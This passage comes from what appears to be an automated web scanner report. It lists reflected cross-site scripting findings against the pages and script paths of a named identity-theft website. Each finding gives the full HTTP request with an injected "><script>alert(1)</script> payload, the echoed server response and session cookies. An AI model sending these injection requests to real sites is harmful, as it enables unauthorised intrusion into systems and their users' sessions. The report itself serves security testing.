<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/credit-monitoring.html89fd3"><script>alert(1)</script>1735da0f233">
...[SNIP]...

6.277. http://www.fightidentitytheft.com/credit-monitoring.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /credit-monitoring.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f55"><script>alert(1)</script>8381f047dea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /credit-monitoring.html?80f55"><script>alert(1)</script>8381f047dea=1 HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:46:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=2f0d8eff6e9fd6be51f18f7762b14408; expires=Tue, 17-May-2011 23:19:38 GMT; path=/; domain=.fightidentitytheft.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:46:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/credit-monitoring.html?80f55"><script>alert(1)</script>8381f047dea=1">
...[SNIP]...

6.278. http://www.fightidentitytheft.com/files/fightid_favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /files/fightid_favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ca1"><script>alert(1)</script>a3ed31c598b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /filesb3ca1"><script>alert(1)</script>a3ed31c598b/fightid_favicon.ico HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7; has_js=1; __utmz=139980452.1303674269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=139980452.2066914421.1303674267.1303674267.1303674267.1; __utmc=139980452; __utmb=139980452.1.10.1303674267; hubspotdt=2011-04-24%2015%3A44%3A15; hubspotutk=230b3f9e98d34fd88226019169d79ef6; hubspotvd=230b3f9e98d34fd88226019169d79ef6; hubspotvw=230b3f9e98d34fd88226019169d79ef6; hubspotvm=230b3f9e98d34fd88226019169d79ef6; hsfirstvisit=http%3A%2F%2Fwww.fightidentitytheft.com%2Fcredit-monitoring.html||2011-04-24%2015%3A44%3A15

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:55:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:55:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/filesb3ca1"><script>alert(1)</script>a3ed31c598b/fightid_favicon.ico">
...[SNIP]...

6.279. http://www.fightidentitytheft.com/files/fightid_favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /files/fightid_favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56355"><script>alert(1)</script>f8cc46ee60f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files/fightid_favicon.ico56355"><script>alert(1)</script>f8cc46ee60f HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7; has_js=1; __utmz=139980452.1303674269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=139980452.2066914421.1303674267.1303674267.1303674267.1; __utmc=139980452; __utmb=139980452.1.10.1303674267; hubspotdt=2011-04-24%2015%3A44%3A15; hubspotutk=230b3f9e98d34fd88226019169d79ef6; hubspotvd=230b3f9e98d34fd88226019169d79ef6; hubspotvw=230b3f9e98d34fd88226019169d79ef6; hubspotvm=230b3f9e98d34fd88226019169d79ef6; hsfirstvisit=http%3A%2F%2Fwww.fightidentitytheft.com%2Fcredit-monitoring.html||2011-04-24%2015%3A44%3A15

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:56:33 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:56:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/files/fightid_favicon.ico56355"><script>alert(1)</script>f8cc46ee60f">
...[SNIP]...

6.280. http://www.fightidentitytheft.com/misc/drupal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2de71"><script>alert(1)</script>66732b5234f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc2de71"><script>alert(1)</script>66732b5234f/drupal.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/misc2de71"><script>alert(1)</script>66732b5234f/drupal.js?i">
...[SNIP]...

6.281. http://www.fightidentitytheft.com/misc/drupal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca7d"><script>alert(1)</script>6c8694e161b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc/drupal.jsdca7d"><script>alert(1)</script>6c8694e161b?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/misc/drupal.jsdca7d"><script>alert(1)</script>6c8694e161b?i">
...[SNIP]...

6.282. http://www.fightidentitytheft.com/misc/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 103ea"><script>alert(1)</script>66382b9c70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc103ea"><script>alert(1)</script>66382b9c70/jquery.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/misc103ea"><script>alert(1)</script>66382b9c70/jquery.js?i">
...[SNIP]...

6.283. http://www.fightidentitytheft.com/misc/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c520"><script>alert(1)</script>d48c9477f01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc/jquery.js4c520"><script>alert(1)</script>d48c9477f01?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/misc/jquery.js4c520"><script>alert(1)</script>d48c9477f01?i">
...[SNIP]...

6.284. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50865"><script>alert(1)</script>eae099e415a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites50865"><script>alert(1)</script>eae099e415a/all/modules/google_analytics/googleanalytics.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites50865"><script>alert(1)</script>eae099e415a/all/modules/google_analytics/googleanalytics.js?i">
...[SNIP]...

6.285. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1755"><script>alert(1)</script>b48cee21d6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/allc1755"><script>alert(1)</script>b48cee21d6c/modules/google_analytics/googleanalytics.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:49:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:49:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/allc1755"><script>alert(1)</script>b48cee21d6c/modules/google_analytics/googleanalytics.js?i">
...[SNIP]...

6.286. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11235"><script>alert(1)</script>dfd118e39c2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules11235"><script>alert(1)</script>dfd118e39c2/google_analytics/googleanalytics.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:51:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:51:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules11235"><script>alert(1)</script>dfd118e39c2/google_analytics/googleanalytics.js?i">
...[SNIP]...

6.287. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7afc"><script>alert(1)</script>7e5663fb150 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/google_analyticsb7afc"><script>alert(1)</script>7e5663fb150/googleanalytics.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:52:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:52:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/google_analyticsb7afc"><script>alert(1)</script>7e5663fb150/googleanalytics.js?i">
...[SNIP]...

6.288. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32c1d"><script>alert(1)</script>1a6f924caa1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/google_analytics/googleanalytics.js32c1d"><script>alert(1)</script>1a6f924caa1?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:53:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:53:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/google_analytics/googleanalytics.js32c1d"><script>alert(1)</script>1a6f924caa1?i">
...[SNIP]...

6.289. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/mollom/mollom.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c42f9"><script>alert(1)</script>43c15deb34d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesc42f9"><script>alert(1)</script>43c15deb34d/all/modules/mollom/mollom.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:28 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
